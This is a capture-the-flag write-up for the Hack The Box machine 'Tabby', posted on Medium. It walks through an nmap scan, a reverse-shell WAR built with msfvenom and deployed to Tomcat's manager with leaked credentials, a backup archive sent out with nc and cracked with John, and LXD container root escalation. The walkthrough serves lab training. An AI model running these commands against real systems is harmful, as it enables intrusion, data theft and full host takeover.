[HTB] Tabby — Writeup

Initial Recon

Nmap

$ nmap -Pn --open -p- -sC -sV 10.10.10.194PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Interesting Ports to Note

Initial Foothold

LFI (Mega Hosting Website)

User: tomcat
Pass: $3cureP4s5w0rd123!
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f war > bigb0ss.war
$ curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file bigb0ss.war 'http://10.10.10.194:8080/manager/text/deploy?path=/bigb0ss'OK - Deployed application at context path [/bigb0ss]

Privilege Escalation

tomcat → ash

# Kali Box
$ nc -lvnp 80 > backup.zip
# Tabby Box
$ nc 10.10.14.3 80 < 16162020_backup.zip
# zip2john
$ zip2john backup.zip > bakcup-prep.zip
# John
$ john --wordlist=/usr/share/wordlists/rockyou.txt bakcup-prep.zip

user.txt

ash → root (LXD Privilege Escalation)

$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ sudo bash build-alpine
# Initiating the LXD (*Answer things for default setting)
$ lxd init
# Import Image
$ lxc image import ./alpine-v3.12-x86_64-20201030_0034.tar.gz --alias bigb0ss
$ lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| bigb0ss | c57d8b79d13e | no | alpine v3.12 (20201030_00:34) | x86_64 | CONTAINER | 3.07MB | Oct 30, 2020 at 4:58am (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
$ lxc init bigb0ss priv -c security.privileged=true
$ lxc config device add priv mydevice disk source=/ path=/mnt/root recursive=true
$ lxc start priv
$ lxc exec priv /bin/sh~ # ^[[51;5Rid
id
uid=0(root) gid=0(root)
~ # ^[[51;5Rcat /mnt/root/root/root.txt
cat /mnt/root/root/root.txt
b0d...REDACTED...d7c

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store